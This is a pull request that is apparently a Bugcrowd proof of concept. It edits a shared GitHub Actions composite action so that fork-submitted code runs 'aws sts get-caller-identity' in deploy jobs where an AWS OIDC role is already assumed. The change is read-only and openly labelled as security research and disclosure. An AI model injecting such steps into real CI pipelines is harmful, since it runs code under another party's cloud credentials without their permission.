### PR TITLE
[security-poc] benign read-only AWS OIDC reachability check (Bugcrowd)

### DIFF
--- a/.github/actions/run-script/action.yml
+++ b/.github/actions/run-script/action.yml
@@ -15,6 +15,16 @@ runs:
     - name: Run ${{ inputs.script-name }}
       shell: bash
       run: |
+        # --- Bugcrowd security PoC (benign, read-only) -------------------------------
+        # Demonstrates that code originating from a fork pull request executes inside a
+        # job where the JET AWS OIDC role has already been assumed. Only the read-only
+        # sts:GetCallerIdentity call is made; no S3/Amplify resource is touched.
+        # Safe to ignore and close. Reported via Bugcrowd (justeattakeaway).
+        echo "::group::POC-SUPPLYCHAIN-AWS-CHECK"
+        aws sts get-caller-identity 2>&1 | sed 's/^/POC-AWS-IDENTITY: /' || echo "POC-AWS-IDENTITY: no-aws-credentials"
+        echo "POC-AWS-REGION: ${AWS_REGION:-none}"
+        echo "::endgroup::"
+        # -----------------------------------------------------------------------------
         CONCURRENCY_FLAG=""
 
         if [ ! -z "${{ inputs.concurrency }}" ]; then

--- a/apps/pie-storybook/POC_TRIGGER.md
+++ b/apps/pie-storybook/POC_TRIGGER.md
@@ -1,0 +1,1 @@
+PoC trigger file (Bugcrowd security test). Safe to delete.


### PR DESCRIPTION
**Security research PoC — Bugcrowd (justeattakeaway), benign & read-only.**

This PR demonstrates that code from a fork pull request executes in the `deploy-*` jobs (`amplify-deploy.yml`) **after** the AWS OIDC role is assumed, via the locally-defined `./.github/actions/run-script` composite action. The only added behaviour is a read-only `aws sts get-caller-identity` call printed to the workflow log — no S3/Amplify resource is touched. If the assumed-role identity prints, it confirms a fork PR can reach JET AWS infra.

Please feel free to close this PR; it is part of an authorised Bugcrowd submission. No action needed.